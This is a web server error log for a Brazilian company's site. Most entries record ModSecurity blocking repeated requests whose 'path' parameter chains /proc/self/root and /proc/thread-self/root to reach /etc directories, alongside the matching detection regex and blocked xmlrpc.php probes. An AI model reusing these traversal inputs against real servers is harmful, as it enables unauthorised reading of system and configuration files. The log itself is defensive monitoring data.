https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Wed Mar 18 13:35:19.616613 2026] [:error] [pid 14269:tid 140411658000128] [client 74.7.243.128:41038] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/default"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abrURwbLMZ6AikZjR9XcmAAAAAo"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Wed Mar 18 13:35:20.770116 2026] [:error] [pid 14269:tid 140411674785536] [client 74.7.243.128:41050] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/default"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abrUSAbLMZ6AikZjR9XcmgAAAAg"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Wed Mar 18 13:35:24.534204 2026] [:error] [pid 17653:tid 140411565680384] [client 74.7.243.128:41066] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/default"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abrUTMdf6f5d65gmYZTxkwAAAtU"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Wed Mar 18 13:35:24.973112 2026] [mime_magic:error] [pid 26799:tid 140411666392832] (70014)End of file found: [client 216.73.216.191:40207] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php
[Wed Mar 18 13:35:25.911417 2026] [:error] [pid 31803:tid 140411716749056] [client 74.7.243.128:41080] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/default"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abrUTeyqAr6etmhZHNrjsQAAAEM"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Wed Mar 18 13:35:29.015766 2026] [:error] [pid 26799:tid 140411725141760] [client 74.7.243.128:41086] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/default"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abrUUda6ubjKNq_cu4a68gAAA0I"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Wed Mar 18 13:35:30.380047 2026] [:error] [pid 26799:tid 140411649607424] [client 74.7.243.128:41240] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/default"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abrUUta6ubjKNq_cu4a69gAAA0s"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Wed Mar 18 13:35:31.607370 2026] [:error] [pid 30077:tid 140411725141760] [client 74.7.243.128:41244] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/default"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abrUU_u8EFLIOrSqIpsfbwAAAkI"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Wed Mar 18 13:35:33.228302 2026] [:error] [pid 15051:tid 140411548894976] [client 74.7.243.128:41254] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/default"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abrUVCmAPhZkrhU8w4mKcQAAAJc"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Wed Mar 18 13:35:34.700588 2026] [:error] [pid 30077:tid 140411557287680] [client 74.7.243.128:41268] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/default"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abrUVvu8EFLIOrSqIpsfcwAAAlY"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Wed Mar 18 13:35:36.048515 2026] [:error] [pid 31803:tid 140411649607424] [client 74.7.243.128:41282] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/default"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abrUWOyqAr6etmhZHNrjuQAAAEs"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Wed Mar 18 13:35:37.318553 2026] [:error] [pid 30077:tid 140411741927168] [client 74.7.243.128:41294] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/default"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abrUWfu8EFLIOrSqIpsfdgAAAkA"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Wed Mar 18 13:35:38.632877 2026] [:error] [pid 29882:tid 140411590858496] [client 74.7.243.128:41304] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/default"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abrUWkzinOy1jxa1j4czwAAAARI"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Wed Mar 18 13:35:39.960282 2026] [:error] [pid 17887:tid 140411624429312] [client 74.7.243.128:46394] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/default"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abrUWwkwaGbbGflqUZAtyAAAAM4"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Wed Mar 18 13:35:41.254342 2026] [:error] [pid 30077:tid 140411548894976] [client 74.7.243.128:46406] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/default"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abrUXfu8EFLIOrSqIpsfewAAAlc"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Wed Mar 18 13:35:42.583790 2026] [:error] [pid 29882:tid 140411708356352] [client 74.7.243.128:46414] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/default"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abrUXkzinOy1jxa1j4czwgAAAQQ"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Wed Mar 18 13:36:15.984694 2026] [mime_magic:error] [pid 14269:tid 140411590858496] (70014)End of file found: [client 57.141.18.11:39546] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php
[Wed Mar 18 13:36:44.131935 2026] [:error] [pid 17653:tid 140411699963648] [client 74.7.243.128:46424] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/run/initramfs/state/etc/sysconfig"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abrUnMdf6f5d65gmYZTx8wAAAsU"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/run/initramfs/state/etc
[Wed Mar 18 13:36:55.316650 2026] [:error] [pid 17887:tid 140411540502272] [client 74.7.241.31:58500] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/modules-load.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abrUpgkwaGbbGflqUZAuBwAAANg"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Wed Mar 18 13:37:20.099077 2026] [:error] [pid 29882:tid 140411716749056] [client 74.7.243.128:41590] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/php-fpm.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abrUwEzinOy1jxa1j4c0LAAAAQM"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Wed Mar 18 13:37:36.038494 2026] [:error] [pid 31803:tid 140411658000128] [client 74.7.243.128:40086] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/php-fpm.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abrU0OyqAr6etmhZHNrkBQAAAEo"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Wed Mar 18 13:37:41.828957 2026] [:error] [pid 15826:tid 140411582465792] [client 74.7.243.128:59098] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/php-fpm.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abrU1eoXxyEfFpUF8f-MDwAAAVM"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Wed Mar 18 13:37:44.555298 2026] [access_compat:error] [pid 26799:tid 140411582465792] [client 195.123.216.134:60184] AH01797: client denied by server configuration: /home/storage/0/fc/16/bandeirantesbomb3/public_html/xmlrpc.php
[Wed Mar 18 13:37:56.306654 2026] [access_compat:error] [pid 15826:tid 140411658000128] [client 45.154.153.6:34993] AH01797: client denied by server configuration: /home/storage/0/fc/16/bandeirantesbomb3/public_html/xmlrpc.php
[Wed Mar 18 13:37:59.191482 2026] [:error] [pid 17653:tid 140411616036608] [client 74.7.243.128:45648] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/php-fpm.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abrU58df6f5d65gmYZTyOwAAAs8"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Wed Mar 18 13:38:10.551049 2026] [access_compat:error] [pid 15051:tid 140411616036608] [client 62.12.118.199:36569] AH01797: client denied by server configuration: /home/storage/0/fc/16/bandeirantesbomb3/public_html/xmlrpc.php
